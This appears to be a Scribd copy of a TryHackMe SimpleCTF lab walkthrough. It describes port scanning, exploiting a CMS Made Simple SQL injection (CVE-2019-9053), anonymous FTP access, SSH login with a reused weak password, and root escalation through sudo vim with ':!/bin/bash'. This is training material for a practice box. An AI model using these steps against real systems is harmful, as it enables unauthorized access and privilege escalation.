Scribd
Upload
6 views

Copy of TryHackMe SimpleCTF Walkthrough

Uploaded by

mwaivictor04
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
6 views

Copy of TryHackMe SimpleCTF Walkthrough

Uploaded by

mwaivictor04
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 8

TryHackMe SimpleCTF Walkthrough

Introduction
This was a simple linux box, that involved exploiting an sql injection attack in CMS made simple to gain
an initial access to the system and root the box via vim.

Enumeration
The first step was to ping the machine to see if it is reachable and if it allows icmp traffic.

Ping <ip>

Afterwards I ran an nmap scan with the following flags

-sCV the flag enables nmap to enumerate for services running on the machine and also it runs defaults
scripts in enumerating the machine.
–script vuln flag enumerates the machine for vulnerabilities it is vulnerable to.

Nmap -sCV –script vuln <ip>

As shown below.
The scan has identified four open ports and their services.
21 ftp
80 http
2222 ssh
Enumerating HTTP
On opening the webpage, I get the following

Doing further enumeration with gobuster, I found other pages

Simple which redirects to another page,however I decided to look at web crawlers, robot.txt which had
some interesting findings but proved to be a decoy.
The openemr-5_0_1_3 was a 404 page and it disclosed the apache version.

However, from the gobuster enumeration, visiting the /simple page we are met with a CMS made simple
web page.

Scrolling down the website, the cms version is disclosed.


Cms made simple version 2.2.8.
With the version of the cms disclosed, we can search for exploits online for the cms.

From the search, the cms is vulnerable to sql injection with cve id of CVE-2019-9053.

From the exploit database, I downloaded the exploit and ran the exploit on the site and got the following
details.

The exploit was running using python2. To see the options to use with the exploit

I used the second example in order to be able to crack the passwords directly,
The wordlist I used was the one provided as a hint in the question.

Enumerating FTP
Since port 21 was open, I tried to login via anonymous login and surprisingly it allowed anonymous logins.
Through the anonymous login, I looked around and found the pub directory. Changing to the directory and
listing the files, I found a text file and downloaded it to my machine. It had the following note.

Interesting, As from the web enumeration and exploit we used, the user who reused the weak password
was mitch.

Trying to login ssh, with the password secret and user mitch, we are able to login.

From there, I got the user flag, as an evidence of a foothold into the system.

Privilege escalation
For privilege escalation, I ran the command sudo -l, to see the commands user mitch is able to run as a
root user.
Researching in gtfobins on how to run vim as root user, I got the following

However,the command did not work immediately but what I did, I had to run sudo vim first in order to
access the vim and then executed :!/bin/bash to get root access to the machine.

As shown above.

From there I accessed the root directory and got my root flag.

Conclusion
From the above room, it was an easy box for any beginner in CTFs, furthermore from the box, findings to
learn were that, one needs to update the softwares and technologies in use and to use stronger
passwords and not same passwords for all accounts.

Below is a proof of my completion of the room.

You might also like